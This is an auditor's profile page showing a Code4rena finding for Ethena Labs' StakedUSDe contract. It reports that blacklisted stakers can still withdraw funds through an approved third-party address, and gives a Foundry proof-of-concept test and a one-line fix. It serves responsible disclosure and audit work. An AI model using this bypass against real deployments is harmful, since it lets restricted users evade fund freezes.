Back to SpicyMeatball's contests

Ethena Labs - SpicyMeatball's results

Enabling The Internet Bond

General Information

Platform: Code4rena

Start Date: 24/10/2023

Pot Size: $36,500 USDC

Total HM: 4

Participants: 147

Period: 6 days

Judge: 0xDjango

Id: 299

League: ETH

Ethena Labs

Findings Distribution

Researcher Performance

Rank: 53/147

Findings: 1

Award: $119.14

🌟 Selected for report: 0

🚀 Solo Findings: 0

External Links

Code4rena Contest PageGithub Contest RepositoryGithub Findings RepositoryEthena Labs

Findings Information

🌟 Selected for report: josephdara

Also found by: 0xAadi, 0xmystery, 0xpiken, Arz, Beosin, Eeyore, HChang26, J4X, KIntern_NA, Limbooo, RamenPeople, SpicyMeatball, Team_Rocket, Yanchuan, castle_chain, degensec, ge6a, lanrebayode77, mert_eren, sorrynotsorry, tnquanghuy0512

Awards

119.1406 USDC - $119.14

Labels

bug
2 (Med Risk)
satisfactory
sufficient quality report
duplicate-499

External Links

Link to GitHub issue

Lines of code

https://github.com/code-423n4/2023-10-ethena/blob/main/contracts/StakedUSDe.sol#L225-L238

Vulnerability details

Impact

FULL_RESTRCITED_STAKER_ROLE is assigned to addresses to completely restrict them from moving their funds. The only exception is that the default admin can move funds from a blacklisted wallet to another.

https://github.com/code-423n4/2023-10-ethena/blob/main/contracts/StakedUSDe.sol#L148

As we can see, blocked users can't transfer their vault tokens to other addresses, and no one can send tokens to them.

https://github.com/code-423n4/2023-10-ethena/blob/main/contracts/StakedUSDe.sol#L245-L252

Withdraw is also prohibited,

https://github.com/code-423n4/2023-10-ethena/blob/main/contracts/StakedUSDe.sol#L232-L233

but there is a loophole, the above check lacks hasRole(FULL_RESTRICTED_STAKER_ROLE, owner), which means a blacklisted user can withdraw their funds with a help of the approved caller.

Proof of Concept

  function testBlacklistWithdraw() public {
    vm.prank(owner);
    stakedUSDe.grantRole(BLACKLIST_MANAGER_ROLE, alice);

    usdeToken.mint(bob, 100_000e18);

    vm.startPrank(bob);
    usdeToken.approve(address(stakedUSDe), 100_000e18);
    stakedUSDe.deposit(100_000e18, bob);
    vm.stopPrank();

    vm.prank(alice);
    stakedUSDe.addToBlacklist(bob, true);
    
    address wallet = makeAddr("totallyNotBob");
    vm.prank(bob);
    stakedUSDe.approve(wallet, ~uint256(0));
    vm.prank(wallet);
    stakedUSDe.withdraw(100_000e18, wallet, bob);
    assertEq(usdeToken.balanceOf(wallet), 100_000e18);
  }

Tools Used

Foundry, StakedUSDe.blacklist.t.sol

Add || hasRole(FULL_RESTRICTED_STAKER_ROLE, owner) to the _withdraw

Assessed type

Access Control

#0 - c4-pre-sort

2023-10-31T02:05:05Z

raymondfam marked the issue as sufficient quality report

#1 - c4-pre-sort

2023-10-31T02:05:53Z

raymondfam marked the issue as duplicate of #7

#2 - c4-pre-sort

2023-11-01T19:44:42Z

raymondfam marked the issue as duplicate of #666

#3 - c4-judge

2023-11-13T19:31:28Z

fatherGoose1 marked the issue as satisfactory

AuditHub

A portfolio for auditors, a security profile for protocols, a hub for web3 security.

Built bymalatrax © 2024

Auditors

Browse

Contests

Browse

Get in touch

ContactTwitter